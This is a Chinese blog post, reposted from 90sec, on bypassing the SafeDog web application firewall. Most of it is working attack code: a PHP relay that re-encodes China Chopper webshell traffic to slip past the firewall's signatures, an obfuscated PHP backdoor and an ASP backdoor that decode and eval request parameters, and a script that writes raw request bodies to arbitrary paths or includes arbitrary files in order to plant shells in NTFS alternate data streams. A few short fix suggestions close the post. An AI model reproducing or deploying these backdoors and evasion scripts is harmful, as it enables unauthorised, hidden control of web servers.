Penetration Test On SafeDog【突破安全狗】

    0×00 安全狗之菜刀的突破
    #原理:
    BAD: caidao -> safedog -X-> backdoor
    GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao

    菜刀发送的数据是会被安全狗拦截,因为菜刀的发的数据已被纳入安全狗的特征码内
    但是如果我们在菜刀与狗之间放一个加密数据的脚本,将原数据进行修改加密,然后再通过脚本发送出去
    类似为一个代理,发出去的数据流到安全狗,因为没有特征码了,数据流到服务器上的shell,shell把加密后的数据进行解密然后再执行,执行完后将数据返回给代理脚本,最终流回菜刀。

    #代码
    #middle.php

    1. <?php
    2. /*
    3.          * Author: Laterain
    4.          * Time: 20130821
    5.          * About: Middle monkey between the hacker and safedog.
    6.          * Just For Fun
    7.          */
    8.         $url = isset($_GET['shell'])?$_GET['shell']:'';
    9.         $pass= isset($_GET['pass'])?$_GET['pass']:'';
    10.         $type= isset($_GET['type'])?$_GET['type']:'php';
    11.         if ($type == 'php') {
    12.                 $shellcode =base64_encode('@eval(base64_decode($_POST[z0]));');
    13.         }
    14.         elseif ($type == 'asp') {
    15.                 $shellcode = base64_encode($_POST[$pass]);
    16.         }
    17.         $shellcode = $pass.'='.urlencode($shellcode);
    18.         foreach ($_POST as $key => $value) {
    19.                 if ($key == $pass) {
    20.                         continue;
    21.                 }
    22.                 $shellcode .= '&'.$key.'='.urlencode($value);
    23.         }
    24.         $ch = curl_init();
    25.         curl_setopt($ch, CURLOPT_URL, $url);
    26.         curl_setopt($ch, CURLOPT_HEADER, 0);
    27.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    28.         curl_setopt($ch, CURLOPT_POST, 1);
    29.         curl_setopt($ch, CURLOPT_POSTFIELDS,$shellcode);
    30.         $data = curl_exec($ch);
    31.         curl_close($ch);
    32.         print_r($data);
    33. ?>

    #php backdoor

    1. <?php
    2. $key = "hack";
    3. preg_replace(base64_decode('L2EvZQ=='),base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFska2V5XSkp'),'a');
    4. ?>

    #asp backdoor

    1. <%
    2.      OPTION EXPLICIT
    3.      const BASE_64_MAP_INIT ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    4.      dim Base64EncMap(63)
    5.      dim Base64DecMap(127)
    6.          dim code
    7.      '初始化函数
    8.      PUBLIC SUB initCodecs()
    9.           ' 初始化变量
    10.           dim max, idx
    11.              max = len(BASE_64_MAP_INIT)
    12.           for idx = 0 to max - 1
    13.                Base64EncMap(idx) = mid(BASE_64_MAP_INIT, idx + 1, 1)
    14.           next
    15.           for idx = 0 to max - 1
    16.                Base64DecMap(ASC(Base64EncMap(idx))) = idx
    17.           next
    18.      END SUB
    19.      'Base64加密函数
    20.      PUBLIC FUNCTION base64Encode(plain)
    21.           if len(plain) = 0 then
    22.                base64Encode = ""
    23.                exit function
    24.           end if
    25.           dim ret, ndx, by3, first, second, third
    26.           by3 = (len(plain) \ 3) * 3
    27.           ndx = 1
    28.           do while ndx <= by3
    29.                first = asc(mid(plain, ndx+0, 1))
    30.                second = asc(mid(plain, ndx+1, 1))
    31.                third = asc(mid(plain, ndx+2, 1))
    32.                ret = ret & Base64EncMap( (first \ 4) AND 63 )
    33.                ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second \ 16) AND 15 ) )
    34.                ret = ret & Base64EncMap( ((second * 4) AND 60) + ((third \ 64) AND 3 ) )
    35.                ret = ret & Base64EncMap( third AND 63)
    36.                ndx = ndx + 3
    37.           loop
    38.           if by3 < len(plain) then
    39.                first = asc(mid(plain, ndx+0, 1))
    40.                ret = ret & Base64EncMap( (first \ 4) AND 63 )
    41.                if (len(plain) MOD 3 ) = 2 then
    42.                     second = asc(mid(plain, ndx+1, 1))
    43.                     ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second \ 16) AND 15 ) )
    44.                     ret = ret & Base64EncMap( ((second * 4) AND 60) )
    45.                else
    46.                     ret = ret & Base64EncMap( (first * 16) AND 48)
    47.                     ret = ret '& "="
    48.                end if
    49.                ret = ret '& "="
    50.           end if
    51.           base64Encode = ret
    52.      END FUNCTION
    53.      'Base64解密函数
    54.      PUBLIC FUNCTION base64Decode(scrambled)
    55.           if len(scrambled) = 0 then
    56.                base64Decode = ""
    57.                exit function
    58.           end if
    59.           dim realLen
    60.           realLen = len(scrambled)
    61.           do while mid(scrambled, realLen, 1) = "="
    62.                realLen = realLen - 1
    63.           loop
    64.           dim ret, ndx, by4, first, second, third, fourth
    65.           ret = ""
    66.           by4 = (realLen \ 4) * 4
    67.           ndx = 1
    68.           do while ndx <= by4
    69.                first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
    70.                second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
    71.                third = Base64DecMap(asc(mid(scrambled, ndx+2, 1)))
    72.                fourth = Base64DecMap(asc(mid(scrambled, ndx+3, 1)))
    73.                ret = ret & chr( ((first * 4) AND 255) +   ((second \ 16) AND 3))
    74.                ret = ret & chr( ((second * 16) AND 255) + ((third \ 4) AND 15))
    75.                ret = ret & chr( ((third * 64) AND 255) + (fourth AND 63))
    76.                ndx = ndx + 4
    77.           loop
    78.           if ndx < realLen then
    79.                first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
    80.                second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
    81.                ret = ret & chr( ((first * 4) AND 255) +   ((second \ 16) AND 3))
    82.                if realLen MOD 4 = 3 then
    83.                     third = Base64DecMap(asc(mid(scrambled,ndx+2,1)))
    84.                     ret = ret & chr( ((second * 16) AND 255) + ((third \ 4) AND 15))
    85.                end if
    86.           end if
    87.           base64Decode = ret
    88.      END FUNCTION
    89. ' 初始化
    90.     call initCodecs
    91.         code = request("hack")
    92.         code = base64Decode(code)
    93.         eval code
    94. %>

    0×01 安全狗之突破恶意代码拦截
    原理:
    php://input没有被检查,在这儿写恶意代码即可。
    以ADS的方式上传了shell之后,包含即可。
    base.php

    1. <?php
    2. if (isset($_GET['inc'])) {
    3.         include($_GET['inc']);
    4. }
    5. elseif (isset($_GET['path'])) {
    6.         fwrite(fopen($_GET['path'], "w"),file_get_contents("php://input"));
    7. }
    8. else {
    9.         echo __FILE__;
    10. }
    11. ?>

    #修复建议:
    1.因为有了middle的任意加密混淆与backdoor的对应解密,安全狗官方应该也很难解决拦截菜刀数据的问题,但是可以从backdoor入手,加强对服务器后门的扫描探测能有效的防止这个问题。
    2.通过包含来获取shell,这就只有加强特征码了。
    3.无法发现ADS创建的后门的问题,我的想法是,服务器自身是不允许访问ads创建的文件的,只能通过包含来访问,那么可以将include,require等里面带:的归为危险文件。当然能直接发现更好。
    4.php://input内容过滤
    PS:本来以为php://input是我最先发现的,但是昨天看见某某在freebuf上提到了这个的利用,我就被打击了。。。于是就发出来吧。。。
    作者:laterain form 90sec

     

    本博客所有文章如无特别注明均为原创。
    复制或转载请以超链接形式注明转自乐橙呀,原文地址《Penetration Test On SafeDog【突破安全狗】
    标签:
    喜欢 | 0
    分享:

还没有人抢沙发呢~